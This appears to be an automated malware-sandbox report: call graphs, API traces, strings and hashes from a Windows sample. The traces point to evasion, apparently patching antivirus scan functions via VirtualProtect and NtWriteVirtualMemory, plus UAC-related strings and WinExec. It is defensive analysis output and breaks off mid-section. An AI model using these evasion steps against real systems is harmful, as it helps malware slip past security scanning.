2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904898 6546->6759 6760 29239df-2924031 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904798 call 290494c WinExec call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290494c call 29046a4 call 291a18c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29036a0 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 6546->6760 6877 2924713-2924d32 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2902ee0 call 2902f08 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 GetCurrentProcess call 2917924 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 6759->6877 6878 2924f4a-29250cd call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904898 6759->6878 7321 2924033-2924036 6760->7321 7322 2924038-29242fa call 2915a64 call 2904b78 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29049a4 RtlMoveMemory call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291a4dc 6760->7322 7580 2924d34-2924d37 6877->7580 7581 2924d39-2924f45 call 29049a4 call 291c898 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 EnumSystemLocalesA GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 GetCurrentProcess call 2917ca8 6877->7581 7014 29250d3-29250e2 call 2904898 6878->7014 7015 292589e-2926f8c call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 * 16 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 29046a4 * 2 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 ExitProcess 6878->7015 7014->7015 7024 29250e8-29253bb call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291d190 call 290480c call 290494c call 29046a4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2907e08 7014->7024 7349 29253c1-2925693 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291cde8 call 2904500 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904d8c * 2 call 2904734 call 291c6d4 7024->7349 7350 2925698-2925899 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 29049a4 call 2918170 7024->7350 7321->7322 7710 29242ff-2924316 call 29036d0 7322->7710 7349->7350 7350->7015 7580->7581 7581->6878
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                  • Part of subcall function 0291D310: RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
                                                                  • Part of subcall function 0291D310: RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
                                                                  • Part of subcall function 0291D310: RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397
                                                                • WinExec.KERNEL32(00000000,00000000), ref: 02923B77
                                                                  • Part of subcall function 0291A18C: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 0291A24F
                                                                • RtlMoveMemory.NTDLL(00000000,00000004,00000000), ref: 029240F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                • API String ID: 897696978-872072817
                                                                • Opcode ID: cf7d3ae11b961da8c9e235b14df6fcc78ff3516fcf95f4c15f7dd085858c1bff
                                                                • Instruction ID: b59b439b7218cec6741c2d1952e70196507997b7d8a8091c1b12ee03b936f8c1
                                                                • Opcode Fuzzy Hash: cf7d3ae11b961da8c9e235b14df6fcc78ff3516fcf95f4c15f7dd085858c1bff
                                                                • Instruction Fuzzy Hash: 8E920A35A5016D8FEB10EBA4CDC0EE9B3B6AFC5314F1055E2E509A7294DE30AE99CF11

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 8295 2901727-2901736 8296 2901968-290196d 8295->8296 8297 290173c-290174c 8295->8297 8300 2901a80-2901a83 8296->8300 8301 2901973-2901984 8296->8301 8298 29017a4-29017ad 8297->8298 8299 290174e-290175b 8297->8299 8298->8299 8306 29017af-29017bb 8298->8306 8302 2901774-2901780 8299->8302 8303 290175d-290176a 8299->8303 8307 2901684-29016ad VirtualAlloc 8300->8307 8308 2901a89-2901a8b 8300->8308 8304 2901986-29019a2 8301->8304 8305 2901938-2901945 8301->8305 8310 29017f0-29017f9 8302->8310 8311 2901782-2901790 8302->8311 8312 2901794-29017a1 8303->8312 8313 290176c-2901770 8303->8313 8314 29019b0-29019bf 8304->8314 8315 29019a4-29019ac 8304->8315 8305->8304 8309 2901947-290195b Sleep 8305->8309 8306->8299 8316 29017bd-29017c9 8306->8316 8317 29016df-29016e5 8307->8317 8318 29016af-29016dc call 2901644 8307->8318 8309->8304 8319 290195d-2901964 Sleep 8309->8319 8325 29017fb-2901808 8310->8325 8326 290182c-2901836 8310->8326 8321 29019c1-29019d5 8314->8321 8322 29019d8-29019e0 8314->8322 8320 2901a0c-2901a22 8315->8320 8316->8299 8323 29017cb-29017de Sleep 8316->8323 8318->8317 8319->8305 8327 2901a24-2901a32 8320->8327 8328 2901a3b-2901a47 8320->8328 8321->8320 8332 29019e2-29019fa 8322->8332 8333 29019fc-29019fe call 29015cc 8322->8333 8323->8299 8331 29017e4-29017eb Sleep 8323->8331 8325->8326 8335 290180a-290181e Sleep 8325->8335 8329 29018a8-29018b4 8326->8329 8330 2901838-2901863 8326->8330 8327->8328 8336 2901a34 8327->8336 8339 2901a68 8328->8339 8340 2901a49-2901a5c 8328->8340 8341 29018b6-29018c8 8329->8341 8342 29018dc-29018eb call 29015cc 8329->8342 8337 2901865-2901873 8330->8337 8338 290187c-290188a 8330->8338 8331->8298 8343 2901a03-2901a0b 8332->8343 8333->8343 8335->8326 8345 2901820-2901827 Sleep 8335->8345 8336->8328 8337->8338 8346 2901875 8337->8346 8347 29018f8 8338->8347 8348 290188c-29018a6 call 2901500 8338->8348 8349 2901a6d-2901a7f 8339->8349 8340->8349 8350 2901a5e-2901a63 call 2901500 8340->8350 8351 29018ca 8341->8351 8352 29018cc-29018da 8341->8352 8354 29018fd-2901936 8342->8354 8360 29018ed-29018f7 8342->8360 8345->8325 8346->8338 8347->8354 8348->8354 8350->8349 8351->8352 8352->8354
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 029017D0
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 029017E6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 0fd05c815a885bea6204ce415cbb64ae72df38e8088e1c929e18d119efd12e51
                                                                • Instruction ID: b5be7d7ffce9582f4de4a7b0b8ba880e40e6679b6ee39e10d6c72c8d10c93daf
                                                                • Opcode Fuzzy Hash: 0fd05c815a885bea6204ce415cbb64ae72df38e8088e1c929e18d119efd12e51
                                                                • Instruction Fuzzy Hash: 95B15172A05B458FCB15CF68E8C0366BBE1FB85360F1886AED85E9B3C5C770A551CB90

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 8361 2900cbd-2900cc6 8362 2905ac8-2905af5 RegOpenKeyExA 8361->8362 8363 2905b84-2905bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8362->8363 8364 2905afb-2905b16 8362->8364 8365 2905bbb-2905bbf 8363->8365 8366 2905c9e-2905ca5 8363->8366 8367 2905b1b call 29058b4 8364->8367 8368 2905bc1-2905bc5 8365->8368 8369 2905bcb-2905be1 lstrlen 8365->8369 8370 2905b20-2905b3e RegQueryValueExA 8367->8370 8368->8366 8368->8369 8371 2905be4-2905be7 8369->8371 8372 2905b40-2905b5c RegQueryValueExA 8370->8372 8373 2905b62-2905b7c RegCloseKey 8370->8373 8374 2905bf3-2905bfb 8371->8374 8375 2905be9-2905bf1 8371->8375 8372->8373 8376 2905b5e 8372->8376 8374->8366 8379 2905c01-2905c06 8374->8379 8375->8374 8378 2905be3 8375->8378 8376->8373 8378->8371 8380 2905c30-2905c32 8379->8380 8381 2905c08-2905c2e lstrcpyn LoadLibraryExA 8379->8381 8380->8366 8382 2905c34-2905c38 8380->8382 8381->8380 8382->8366 8383 2905c3a-2905c6a lstrcpyn LoadLibraryExA 8382->8383 8383->8366 8384 2905c6c-2905c9c lstrcpyn LoadLibraryExA 8383->8384 8384->8366
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                • RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                • RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                • lstrlen.KERNEL32(00000000), ref: 02905BD2
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C19
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C29
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C51
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C61
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C87
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C97
                                                                  • Part of subcall function 029058B4: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
                                                                  • Part of subcall function 029058B4: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
                                                                  • Part of subcall function 029058B4: lstrcpyn.KERNEL32(?,?,?), ref: 02905918
                                                                Strings
                                                                • Software\Borland\Delphi\Locales, xrefs: 02905AE4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoad$LocaleQueryValue$AddressCloseHandleInfoModuleOpenProcThreadlstrlen
                                                                • String ID: Software\Borland\Delphi\Locales
                                                                • API String ID: 242553506-388148995
                                                                • Opcode ID: 6f77d18874a18cdf12b0128415028217c590d483b5cae34063a6c6c0fee0aa7a
                                                                • Instruction ID: b1f1c1e4fb7e67eb4c241204af1aa86213300e005d540a027698b7bece41a054
                                                                • Opcode Fuzzy Hash: 6f77d18874a18cdf12b0128415028217c590d483b5cae34063a6c6c0fee0aa7a
                                                                • Instruction Fuzzy Hash: 05117C7160024CAEFB1186A48C96FEFBBBCFB48714F924099EA01EA1C1D674A904DF65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D6D
                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02917D73
                                                                • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D8D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID: irtualProtect$kernel32
                                                                • API String ID: 2099061454-2063912171
                                                                • Opcode ID: 069fdec0591647bcbaee8d878b7fdfed9a52130bda56fadfa0d6a7e1e602058e
                                                                • Instruction ID: cfcfff23ae289e2454732d5d16bbabf3d821aaa32e851a2a5d565707b9180947
                                                                • Opcode Fuzzy Hash: 069fdec0591647bcbaee8d878b7fdfed9a52130bda56fadfa0d6a7e1e602058e
                                                                • Instruction Fuzzy Hash: 9D014B7964420DAFEB00EFE9DC81EAEB7EDEF89710F514460BA14D76C0D734AA108B25

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 8398 2901a8f-2901a9b 8399 2901aa1-2901aa5 8398->8399 8400 2901b6c-2901b6f 8398->8400 8401 2901aa7-2901aae 8399->8401 8402 2901b08-2901b11 8399->8402 8403 2901b75-2901b7f 8400->8403 8404 2901c5c-2901c60 8400->8404 8405 2901ab0-2901abb 8401->8405 8406 2901adc-2901ade 8401->8406 8402->8401 8411 2901b13-2901b27 Sleep 8402->8411 8407 2901b81-2901b8d 8403->8407 8408 2901b3c-2901b49 8403->8408 8409 2901c66-2901c6b 8404->8409 8410 29016e8-29016f0 call 2901644 8404->8410 8412 2901ac4-2901ad9 8405->8412 8413 2901abd-2901ac2 8405->8413 8416 2901ae0-2901af1 8406->8416 8417 2901af3 8406->8417 8414 2901bc4-2901bd2 8407->8414 8415 2901b8f-2901b92 8407->8415 8408->8407 8420 2901b4b-2901b5f Sleep 8408->8420 8425 29016f5-290170b VirtualFree 8410->8425 8411->8401 8419 2901b2d-2901b38 Sleep 8411->8419 8422 2901b96-2901b9a 8414->8422 8424 2901bd4-2901bd9 call 29014c0 8414->8424 8415->8422 8416->8417 8423 2901af6-2901b03 8416->8423 8417->8423 8419->8402 8420->8407 8421 2901b61-2901b68 Sleep 8420->8421 8421->8408 8426 2901bdc-2901be9 8422->8426 8427 2901b9c-2901ba2 8422->8427 8423->8403 8424->8422 8429 2901716 8425->8429 8430 290170d-2901714 8425->8430 8426->8427 8435 2901beb-2901bf2 call 29014c0 8426->8435 8432 2901bf4-2901bfe 8427->8432 8433 2901ba4-2901bc2 call 2901500 8427->8433 8431 2901719-2901723 8429->8431 8430->8431 8431->8398 8437 2901c00-2901c28 VirtualFree 8432->8437 8438 2901c2c-2901c59 call 2901560 8432->8438 8435->8427
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02901B17
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02901B31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 9910c928067515cc03f7bf918f74a2b929b4695dc94c3e301a6163341544c5ea
                                                                • Instruction ID: 6155f374303bcc82cd0fd03ebe9b515b4804e7501acc21716df2de80468f763a
                                                                • Opcode Fuzzy Hash: 9910c928067515cc03f7bf918f74a2b929b4695dc94c3e301a6163341544c5ea
                                                                • Instruction Fuzzy Hash: E3510E71A042448FEB15CF6CC9C4766BBD8AF89314F1885AED84DCB2C6E7B0C445CBA1

                                                                Control-flow Graph

                                                                APIs
                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291D086
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CheckConnectionInternet
                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                • API String ID: 3847983778-3852638603
                                                                • Opcode ID: 5b540964a93988469de83d88fad7d2b9396aed8c993321d8aea5b2f3dd49b929
                                                                • Instruction ID: 405f2a2270bfa87ccad4478eef65b1af8d207ddbe74c91c7425d857585e98472
                                                                • Opcode Fuzzy Hash: 5b540964a93988469de83d88fad7d2b9396aed8c993321d8aea5b2f3dd49b929
                                                                • Instruction Fuzzy Hash: 72410B35B1010D9FEB10EBE5C881E9EB3FAEFC8710F215471E551A7280DA74AD068F65
                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CEC,?,?,02913878,00000001), ref: 02915C00
                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CEC,?,?,02913878,00000001), ref: 02915C2E
                                                                  • Part of subcall function 02907D08: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02913878,02915C6E,00000000,02915CEC,?,?,02913878), ref: 02907D56
                                                                  • Part of subcall function 02907F10: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02913878,02915C89,00000000,02915CEC,?,?,02913878,00000001), ref: 02907F2F
                                                                • GetLastError.KERNEL32(00000000,02915CEC,?,?,02913878,00000001), ref: 02915C93
                                                                  • Part of subcall function 0290A6F0: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0290C351,00000000,0290C3AB), ref: 0290A70F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                • String ID:
                                                                • API String ID: 503785936-0
                                                                • Opcode ID: f22af803d976d8b14e3cc7d9bce511288e11c4d163ea81fb6dfd3395189d86d5
                                                                • Instruction ID: 78c623075ab98c2406ccecc5e53c6c8585f4b4c19d9c40f13164a04b86ee8bdf
                                                                • Opcode Fuzzy Hash: f22af803d976d8b14e3cc7d9bce511288e11c4d163ea81fb6dfd3395189d86d5
                                                                • Instruction Fuzzy Hash: 32316070A0030C9FDB00EFA9C8C0BAEBBF6AF88714F918469E904A73C1D77559458FA5
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                • GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                  • Part of subcall function 02917D2C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D6D
                                                                  • Part of subcall function 02917D2C: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02917D73
                                                                  • Part of subcall function 02917D2C: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02917DB1,?,?,00000000,00000000), ref: 02917D8D
                                                                  • Part of subcall function 02917B3C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02917C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02917BBE
                                                                  • Part of subcall function 02917B3C: GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02917BC4
                                                                  • Part of subcall function 02917B3C: GetCurrentProcess.KERNELBASE ref: 02917BCE
                                                                  • Part of subcall function 02917A74: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
                                                                  • Part of subcall function 02917A74: GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
                                                                  • Part of subcall function 02917A74: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
